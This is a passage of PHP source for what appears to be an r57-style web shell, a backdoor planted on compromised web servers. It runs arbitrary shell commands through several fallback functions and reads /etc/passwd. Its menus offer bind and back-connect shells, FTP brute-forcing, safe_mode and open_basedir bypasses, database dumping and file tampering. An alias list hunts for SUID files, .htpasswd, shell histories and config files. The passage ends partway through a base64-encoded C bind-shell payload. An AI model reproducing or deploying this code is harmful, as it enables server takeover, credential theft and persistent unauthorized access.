 886  echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
 887  foreach (@ini_get_all() as $key=>$value)
 888   {
 889   $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
 890   }
 891  echo $r;
 892  echo '</table>';
 893  }
 894 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 895 die();
 896 }
 897 if(isset($_GET['cpu']))
 898  {
 899    echo $head;
 900    echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
 901    $cpuf = @file("cpuinfo");
 902    if($cpuf)
 903     {
 904       $c = @sizeof($cpuf);
 905       for($i=0;$i<$c;$i++)
 906         {
 907           $info = @explode(":",$cpuf[$i]);
 908           if($info[1]==""){ $info[1]="---"; }
 909           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
 910         }
 911       echo $r;
 912     }
 913    else
 914     {
 915       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
 916     }
 917    echo '</table>';
 918    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 919    die();
 920  }
 921 if(isset($_GET['mem']))
 922  {
 923    echo $head;
 924    echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
 925    $memf = @file("meminfo");
 926    if($memf)
 927     {
 928       $c = sizeof($memf);
 929       for($i=0;$i<$c;$i++)
 930         {
 931           $info = explode(":",$memf[$i]);
 932           if($info[1]==""){ $info[1]="---"; }
 933           $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
 934         }
 935       echo $r;
 936     }
 937    else
 938     {
 939       echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
 940     }
 941    echo '</table>';
 942    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
 943    die();
 944  }
 945 $lang=array(
 946 'ru_text1' =>'??????????? ???????',
 947 'ru_text2' =>'?????????? ?????? ?? ???????',
 948 'ru_text3' =>'????????? ???????',
 949 'ru_text4' =>'??????? ??????????',
 950 'ru_text5' =>'???????? ?????? ?? ??????',
 951 'ru_text6' =>'????????? ????',
 952 'ru_text7' =>'??????',
 953 'ru_text8' =>'???????? ?????',
 954 'ru_butt1' =>'?????????',
 955 'ru_butt2' =>'?????????',
 956 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
 957 'ru_text10'=>'??????? ????',
 958 'ru_text11'=>'?????? ??? ???????',
 959 'ru_butt3' =>'???????',
 960 'ru_text12'=>'back-connect',
 961 'ru_text13'=>'IP-?????',
 962 'ru_text14'=>'????',
 963 'ru_butt4' =>'?????????',
 964 'ru_text15'=>'???????? ?????? ? ?????????? ???????',
 965 'ru_text16'=>'????????????',
 966 'ru_text17'=>'????????? ????',
 967 'ru_text18'=>'????????? ????',
 968 'ru_text19'=>'Exploits',
 969 'ru_text20'=>'????????????',
 970 'ru_text21'=>'????? ???',
 971 'ru_text22'=>'datapipe',
 972 'ru_text23'=>'????????? ????',
 973 'ru_text24'=>'????????? ????',
 974 'ru_text25'=>'????????? ????',
 975 'ru_text26'=>'????????????',
 976 'ru_butt5' =>'?????????',
 977 'ru_text28'=>'?????? ? safe_mode',
 978 'ru_text29'=>'?????? ????????',
 979 'ru_butt6' =>'???????',
 980 'ru_text30'=>'???????? ?????',
 981 'ru_butt7' =>'???????',
 982 'ru_text31'=>'???? ?? ??????',
 983 'ru_text32'=>'?????????? PHP ????',
 984 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
 985 'ru_butt8' =>'?????????',
 986 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
 987 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
 988 'ru_text36'=>'???? . ???????',
 989 'ru_text37'=>'?????',
 990 'ru_text38'=>'??????',
 991 'ru_text39'=>'????',
 992 'ru_text40'=>'???? ??????? ???? ??????',
 993 'ru_butt9' =>'????',
 994 'ru_text41'=>'????????? ? ?????',
 995 'ru_text42'=>'?????????????? ?????',
 996 'ru_text43'=>'????????????? ????',
 997 'ru_butt10'=>'?????????',
 998 'ru_butt11'=>'?????????????',
 999 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
1000 'ru_text45'=>'???? ????????',
1001 'ru_text46'=>'???????? phpinfo()',
1002 'ru_text47'=>'???????? ???????? php.ini',
1003 'ru_text48'=>'???????? ????????? ??????',
1004 'ru_text49'=>'???????? ??????? ? ???????',
1005 'ru_text50'=>'?????????? ? ??????????',
1006 'ru_text51'=>'?????????? ? ??????',
1007 'ru_text52'=>'????? ??? ??????',
1008 'ru_text53'=>'?????? ? ?????',
1009 'ru_text54'=>'????? ?????? ? ??????',
1010 'ru_butt12'=>'?????',
1011 'ru_text55'=>'?????? ? ??????',
1012 'ru_text56'=>'?????? ?? ???????',
1013 'ru_text57'=>'???????/??????? ????/??????????',
1014 'ru_text58'=>'???',
1015 'ru_text59'=>'????',
1016 'ru_text60'=>'??????????',
1017 'ru_butt13'=>'???????/???????',
1018 'ru_text61'=>'???? ??????',
1019 'ru_text62'=>'?????????? ???????',
1020 'ru_text63'=>'???? ??????',
1021 'ru_text64'=>'?????????? ???????',
1022 'ru_text65'=>'???????',
1023 'ru_text66'=>'???????',
1024 'ru_text67'=>'Chown/Chgrp/Chmod',
1025 'ru_text68'=>'???????',
1026 'ru_text69'=>'????????1',
1027 'ru_text70'=>'????????2',
1028 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
1029 'ru_text72'=>'????? ??? ??????',
1030 'ru_text73'=>'?????? ? ?????',
1031 'ru_text74'=>'?????? ? ??????',
1032 'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
1033 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
1034 'ru_text80'=>'???',
1035 'ru_text81'=>'????',
1036 'ru_text82'=>'???? ??????',
1037 'ru_text83'=>'?????????? SQL ???????',
1038 'ru_text84'=>'SQL ??????',
1039 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
1040 'ru_text86'=>'?????????? ????? ? ???????',
1041 'ru_butt14'=>'???????',
1042 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
1043 'ru_text88'=>'FTP-??????:????',
1044 'ru_text89'=>'???? ?? ftp ???????',
1045 'ru_text90'=>'????? ????????',
1046 'ru_text91'=>'???????????? ?',
1047 'ru_text92'=>'??? ?????????',
1048 'ru_text93'=>'FTP',
1049 'ru_text94'=>'FTP-????????',
1050 'ru_text95'=>'?????? ?????????????',
1051 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
1052 'ru_text97'=>'????????? ??????????: ',
1053 'ru_text98'=>'??????? ???????????: ',
1054 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
1055 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
1056 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
1057 'ru_text102'=>'?????',
1058 'ru_text103'=>'???????? ??????',
1059 'ru_text104'=>'???????? ????? ?? ???????? ????',
1060 'ru_text105'=>'????',
1061 'ru_text106'=>'??',
1062 'ru_text107'=>'????',
1063 'ru_butt15'=>'?????????',
1064 'ru_text108'=>'????? ??????',
1065 'ru_text109'=>'????????',
1066 'ru_text110'=>'??????????',
1067 'ru_text111'=>'SQL-?????? : ????',
1068 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
1069 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
1070 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
1071 /* --------------------------------------------------------------- */
1072 'eng_text1' =>'Executed command',
1073 'eng_text2' =>'Execute command on server',
1074 'eng_text3' =>'Run command',
1075 'eng_text4' =>'Work directory',
1076 'eng_text5' =>'Upload files on server',
1077 'eng_text6' =>'Local file',
1078 'eng_text7' =>'Aliases',
1079 'eng_text8' =>'Select alias',
1080 'eng_butt1' =>'Execute',
1081 'eng_butt2' =>'Upload',
1082 'eng_text9' =>'Bind port to /bin/bash',
1083 'eng_text10'=>'Port',
1084 'eng_text11'=>'Password for access',
1085 'eng_butt3' =>'Bind',
1086 'eng_text12'=>'back-connect',
1087 'eng_text13'=>'IP',
1088 'eng_text14'=>'Port',
1089 'eng_butt4' =>'Connect',
1090 'eng_text15'=>'Upload files from remote server',
1091 'eng_text16'=>'With',
1092 'eng_text17'=>'Remote file',
1093 'eng_text18'=>'Local file',
1094 'eng_text19'=>'Exploits',
1095 'eng_text20'=>'Use',
1096 'eng_text21'=>'&nbsp;New name',
1097 'eng_text22'=>'datapipe',
1098 'eng_text23'=>'Local port',
1099 'eng_text24'=>'Remote host',
1100 'eng_text25'=>'Remote port',
1101 'eng_text26'=>'Use',
1102 'eng_butt5' =>'Run',
1103 'eng_text28'=>'Work in safe_mode',
1104 'eng_text29'=>'ACCESS DENIED',
1105 'eng_butt6' =>'Change',
1106 'eng_text30'=>'Cat file',
1107 'eng_butt7' =>'Show',
1108 'eng_text31'=>'File not found',
1109 'eng_text32'=>'Eval PHP code',
1110 'eng_text33'=>'Test bypass open_basedir with cURL functions',
1111 'eng_butt8' =>'Test',
1112 'eng_text34'=>'Test bypass safe_mode with include function',
1113 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
1114 'eng_text36'=>'Database . Table',
1115 'eng_text37'=>'Login',
1116 'eng_text38'=>'Password',
1117 'eng_text39'=>'Database',
1118 'eng_text40'=>'Dump database table',
1119 'eng_butt9' =>'Dump',
1120 'eng_text41'=>'Save dump in file',
1121 'eng_text42'=>'Edit files',
1122 'eng_text43'=>'File for edit',
1123 'eng_butt10'=>'Save',
1124 'eng_text44'=>'Can\'t edit file! Only read access!',
1125 'eng_text45'=>'File saved',
1126 'eng_text46'=>'Show phpinfo()',
1127 'eng_text47'=>'Show variables from php.ini',
1128 'eng_text48'=>'Delete temp files',
1129 'eng_butt11'=>'Edit file',
1130 'eng_text49'=>'Delete script from server',
1131 'eng_text50'=>'View cpu info',
1132 'eng_text51'=>'View memory info',
1133 'eng_text52'=>'Find text',
1134 'eng_text53'=>'In dirs',
1135 'eng_text54'=>'Find text in files',
1136 'eng_butt12'=>'Find',
1137 'eng_text55'=>'Only in files',
1138 'eng_text56'=>'Nothing :(',
1139 'eng_text57'=>'Create/Delete File/Dir',
1140 'eng_text58'=>'name',
1141 'eng_text59'=>'file',
1142 'eng_text60'=>'dir',
1143 'eng_butt13'=>'Create/Delete',
1144 'eng_text61'=>'File created',
1145 'eng_text62'=>'Dir created',
1146 'eng_text63'=>'File deleted',
1147 'eng_text64'=>'Dir deleted',
1148 'eng_text65'=>'Create',
1149 'eng_text66'=>'Delete',
1150 'eng_text67'=>'Chown/Chgrp/Chmod',
1151 'eng_text68'=>'Command',
1152 'eng_text69'=>'param1',
1153 'eng_text70'=>'param2',
1154 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1155 'eng_text72'=>'Text for find',
1156 'eng_text73'=>'Find in folder',
1157 'eng_text74'=>'Find in files',
1158 'eng_text75'=>'* you can use regexp',
1159 'eng_text76'=>'Search text in files via find',
1160 'eng_text80'=>'Type',
1161 'eng_text81'=>'Net',
1162 'eng_text82'=>'Databases',
1163 'eng_text83'=>'Run SQL query',
1164 'eng_text84'=>'SQL query',
1165 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1166 'eng_text86'=>'Download files from server',
1167 'eng_butt14'=>'Download',
1168 'eng_text87'=>'Download files from remote ftp-server',
1169 'eng_text88'=>'FTP-server:port',
1170 'eng_text89'=>'File on ftp',
1171 'eng_text90'=>'Transfer mode',
1172 'eng_text91'=>'Archivation',
1173 'eng_text92'=>'without archivation',
1174 'eng_text93'=>'FTP',
1175 'eng_text94'=>'FTP-bruteforce',
1176 'eng_text95'=>'Users list',
1177 'eng_text96'=>'Can\'t get users list',
1178 'eng_text97'=>'checked: ',
1179 'eng_text98'=>'success: ',
1180 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1181 'eng_text100'=>'Send file to remote ftp server',
1182 'eng_text101'=>'Use reverse (user -> resu) login for password',
1183 'eng_text102'=>'Mail',
1184 'eng_text103'=>'Send email',
1185 'eng_text104'=>'Send file to email',
1186 'eng_text105'=>'To',
1187 'eng_text106'=>'From',
1188 'eng_text107'=>'Subj',
1189 'eng_butt15'=>'Send',
1190 'eng_text108'=>'Mail',
1191 'eng_text109'=>'Hide',
1192 'eng_text110'=>'Show',
1193 'eng_text111'=>'SQL-Server : Port',
1194 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1195 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1196 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1197 'eng_text777'=>'bypass safemode with copy()',
1198 'eng_text888'=>'File name',
1199 'eng_text7777'=>'bypass safemode with curl()',
1200 'eng_text8888'=>'File name',
1201 'eng_text999'=>'bypass safemode with imap()',
1202 'eng_text9999'=>'File name',
1203 'eng_text1010'=>'bypass safemode with id()',
1204 'eng_text101010'=>'',
1205 );
1206 /*
1207 ?????? ??????
1208 ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
1209 ?? ?????? ???? ????????? ??? ???????? ???????.
1210 */
1211 $aliases=array(
1212 'find suid files'=>'find / -type f -perm -04000 -ls',
1213 'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
1214 'find sgid files'=>'find / -type f -perm -02000 -ls',
1215 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
1216 'find config.inc.php files'=>'find / -type f -name config.inc.php',
1217 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
1218 'find config* files'=>'find / -type f -name "config*"',
1219 'find config* files in current dir'=>'find . -type f -name "config*"',
1220 'find all writable files'=>'find / -type f -perm -2 -ls',
1221 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
1222 'find all writable directories'=>'find /  -type d -perm -2 -ls',
1223 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
1224 'find all writable directories and files'=>'find / -perm -2 -ls',
1225 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
1226 'find all service.pwd files'=>'find / -type f -name service.pwd',
1227 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
1228 'find all .htpasswd files'=>'find / -type f -name .htpasswd',
1229 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
1230 'find all .bash_history files'=>'find / -type f -name .bash_history',
1231 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
1232 'find all .mysql_history files'=>'find / -type f -name .mysql_history',
1233 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
1234 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
1235 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
1236 'list file attributes on a Linux second extended file system'=>'lsattr -va',
1237 'show opened ports'=>'netstat -an | grep -i listen',
1238 '----------------------------------------------------------------------------------------------------'=>'ls -la'
1239 );
1240 $table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
1241 $table_up2  = " ::</div></b></font></td></tr><tr><td>";
1242 $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
1243 $table_end1 = "</td></tr>";
1244 $arrow = " <font face=Wingdings color=gray>?</font>";
1245 $lb = "<font color=black>[</font>";
1246 $rb = "<font color=black>]</font>";
1247 $font = "<font face=Verdana size=-2>";
1248 $ts = "<table class=table1 width=100% align=center>";
1249 $te = "</table>";
1250 $fs = "<form name=form method=POST>";
1251 $fe = "</form>";
1252 if(isset($_GET['users']))
1253  {
1254  if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
1255  else
1256   {
1257   echo '<center>';
1258   foreach($users as $user) { echo $user."<br>"; }
1259   echo '</center>';
1260   }
1261  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1262  }
1263 if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
1264 $dir = @getcwd();
1265 $windows = 0;
1266 $unix = 0;
1267 if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
1268 if(empty($dir))
1269  {
1270  $os = getenv('OS');
1271  if(empty($os)){ $os = php_uname(); }
1272  if(empty($os)){ $os ="-"; $unix=1; }
1273  else
1274     {
1275     if(@eregi("^win",$os)) { $windows = 1; }
1276     else { $unix = 1; }
1277     }
1278  }
1279 if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1280   {
1281     echo $head;
1282     if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1283     else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
1284     $sr->SearchText(0,0);
1285     $res = $sr->GetResultFiles();
1286     $found = $sr->GetMatchesCount();
1287     $titles = $sr->GetTitles();
1288     $r = "";
1289     if($found > 0)
1290     {
1291       $r .= "<TABLE width=100%>";
1292       foreach($res as $file=>$v)
1293       {
1294         $r .= "<TR>";
1295         $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
1296         $r .= ($windows)? str_replace("/","\\",$file) : $file;
1297         $r .= "</b></font></ TD>";
1298         $r .= "</TR>";
1299         foreach($v as $a=>$b)
1300         {
1301           $r .= "<TR>";
1302           $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1303           $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1304           $r .= "</TR>\n";
1305         }
1306       }
1307       $r .= "</TABLE>";
1308     echo $r;
1309     }
1310     else
1311     {
1312       echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1313     }
1314   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1315   die();
1316   }
1317 if(strpos(ex("echo abctryag"),"tryag")!=3) { $safe_mode = 1; }
1318 $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1319 if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
1320 function ws($i)
1321 {
1322 return @str_repeat("&nbsp;",$i);
1323 }
1324 function ex($cfe)
1325 {
1326  $res = '';
1327  if (!empty($cfe))
1328  {
1329   if(function_exists('exec'))
1330    {
1331     @exec($cfe,$res);
1332     $res = join("\n",$res);
1333    }
1334   elseif(function_exists('shell_exec'))
1335    {
1336     $res = @shell_exec($cfe);
1337    }
1338   elseif(function_exists('system'))
1339    {
1340     @ob_start();
1341     @system($cfe);
1342     $res = @ob_get_contents();
1343     @ob_end_clean();
1344    }
1345   elseif(function_exists('passthru'))
1346    {
1347     @ob_start();
1348     @passthru($cfe);
1349     $res = @ob_get_contents();
1350     @ob_end_clean();
1351    }
1352   elseif(@is_resource($f = @popen($cfe,"r")))
1353   {
1354    $res = "";
1355    while(!@feof($f)) { $res .= @fread($f,1024); }
1356    @pclose($f);
1357   }
1358  }
1359  return $res;
1360 }
1361 function get_users()
1362 {
1363   $users = array();
1364   $rows=file('/etc/passwd');
1365   if(!$rows) return 0;
1366   foreach ($rows as $string)
1367    {
1368            $user = @explode(":",$string);
1369            if(substr($string,0,1)!='#') array_push($users,$user[0]);
1370    }
1371   return $users;
1372 }
1373 function we($i)
1374 {
1375 if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
1376 else { $text = "[-] ERROR! Can't write in file "; }
1377 echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1378 return null;
1379 }
1380 function re($i)
1381 {
1382 if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
1383 else { $text = "[-] ERROR! Can't read file "; }
1384 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1385 return null;
1386 }
1387 function ce($i)
1388 {
1389 if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
1390 else { $text = "Can't create "; }
1391 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
1392 return null;
1393 }
1394 function fe($l,$n)
1395 {
1396 $text['ru']  = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');
1397 $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');
1398 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
1399 return null;
1400 }
1401 function mr($l,$n)
1402 {
1403 $text['ru']  = array('?? ??????? ????????? ??????','?????? ??????????');
1404 $text['eng'] = array('Can\'t send mail','Mail sent');
1405 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
1406 return null;
1407 }
1408 function perms($mode)
1409 {
1410 if ($GLOBALS['windows']) return 0;
1411 if( $mode & 0x1000 ) { $type='p'; }
1412 else if( $mode & 0x2000 ) { $type='c'; }
1413 else if( $mode & 0x4000 ) { $type='d'; }
1414 else if( $mode & 0x6000 ) { $type='b'; }
1415 else if( $mode & 0x8000 ) { $type='-'; }
1416 else if( $mode & 0xA000 ) { $type='l'; }
1417 else if( $mode & 0xC000 ) { $type='s'; }
1418 else $type='u';
1419 $owner["read"] = ($mode & 00400) ? 'r' : '-';
1420 $owner["write"] = ($mode & 00200) ? 'w' : '-';
1421 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
1422 $group["read"] = ($mode & 00040) ? 'r' : '-';
1423 $group["write"] = ($mode & 00020) ? 'w' : '-';
1424 $group["execute"] = ($mode & 00010) ? 'x' : '-';
1425 $world["read"] = ($mode & 00004) ? 'r' : '-';
1426 $world["write"] = ($mode & 00002) ? 'w' : '-';
1427 $world["execute"] = ($mode & 00001) ? 'x' : '-';
1428 if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1429 if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1430 if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1431 $s=sprintf("%1s", $type);
1432 $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1433 $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1434 $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1435 return trim($s);
1436 }
1437 function in($type,$name,$size,$value)
1438 {
1439  $ret = "<input type=".$type." name=".$name." ";
1440  if($size != 0) { $ret .= "size=".$size." "; }
1441  $ret .= "value=\"".$value."\">";
1442  return $ret;
1443 }
1444 function which($pr)
1445 {
1446 $path = ex("which $pr");
1447 if(!empty($path)) { return $path; } else { return $pr; }
1448 }
1449 function cf($fname,$text)
1450 {
1451  $w_file=@fopen($fname,"w") or we($fname);
1452  if($w_file)
1453  {
1454  @fputs($w_file,@base64_decode($text));
1455  @fclose($w_file);
1456  }
1457 }
1458 function sr($l,$t1,$t2)
1459  {
1460  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1461  }
1462 if (!@function_exists("view_size"))
1463 {
1464 function view_size($size)
1465 {
1466  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1467  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1468  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1469  else {$size = $size . " B";}
1470  return $size;
1471 }
1472 }
1473   function DirFilesR($dir,$types='')
1474   {
1475     $files = Array();
1476     if(($handle = @opendir($dir)))
1477     {
1478       while (false !== ($file = @readdir($handle)))
1479       {
1480         if ($file != "." && $file != "..")
1481         {
1482           if(@is_dir($dir."/".$file))
1483             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1484           else
1485           {
1486             $pos = @strrpos($file,".");
1487             $ext = @substr($file,$pos,@strlen($file)-$pos);
1488             if($types)
1489             {
1490               if(@in_array($ext,explode(';',$types)))
1491                 $files[] = $dir."/".$file;
1492             }
1493             else
1494               $files[] = $dir."/".$file;
1495           }
1496         }
1497       }
1498       @closedir($handle);
1499     }
1500     return $files;
1501   }
1502   class SearchResult
1503   {
1504     var $text;
1505     var $FilesToSearch;
1506     var $ResultFiles;
1507     var $FilesTotal;
1508     var $MatchesCount;
1509     var $FileMatschesCount;
1510     var $TimeStart;
1511     var $TimeTotal;
1512     var $titles;
1513     function SearchResult($dir,$text,$filter='')
1514     {
1515       $dirs = @explode(";",$dir);
1516       $this->FilesToSearch = Array();
1517       for($a=0;$a<count($dirs);$a++)
1518         $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1519       $this->text = $text;
1520       $this->FilesTotal = @count($this->FilesToSearch);
1521       $this->TimeStart = getmicrotime();
1522       $this->MatchesCount = 0;
1523       $this->ResultFiles = Array();
1524       $this->FileMatchesCount = Array();
1525       $this->titles = Array();
1526     }
1527     function GetFilesTotal() { return $this->FilesTotal; }
1528     function GetTitles() { return $this->titles; }
1529     function GetTimeTotal() { return $this->TimeTotal; }
1530     function GetMatchesCount() { return $this->MatchesCount; }
1531     function GetFileMatchesCount() { return $this->FileMatchesCount; }
1532     function GetResultFiles() { return $this->ResultFiles; }
1533     function SearchText($phrase=0,$case=0) {
1534     $qq = @explode(' ',$this->text);
1535     $delim = '|';
1536       if($phrase)
1537         foreach($qq as $k=>$v)
1538           $qq[$k] = '\b'.$v.'\b';
1539       $words = '('.@implode($delim,$qq).')';
1540       $pattern = "/".$words."/";
1541       if(!$case)
1542         $pattern .= 'i';
1543       foreach($this->FilesToSearch as $k=>$filename)
1544       {
1545         $this->FileMatchesCount[$filename] = 0;
1546         $FileStrings = @file($filename) or @next;
1547         for($a=0;$a<@count($FileStrings);$a++)
1548         {
1549           $count = 0;
1550           $CurString = $FileStrings[$a];
1551           $CurString = @Trim($CurString);
1552           $CurString = @strip_tags($CurString);
1553           $aa = '';
1554           if(($count = @preg_match_all($pattern,$CurString,$aa)))
1555           {
1556             $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1557             $this->ResultFiles[$filename][$a+1] = $CurString;
1558             $this->MatchesCount += $count;
1559             $this->FileMatchesCount[$filename] += $count;
1560           }
1561         }
1562       }
1563       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1564     }
1565   }
1566   function getmicrotime()
1567   {
1568     list($usec,$sec) = @explode(" ",@microtime());
1569     return ((float)$usec + (float)$sec);
1570   }
1571 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1572 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1573 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
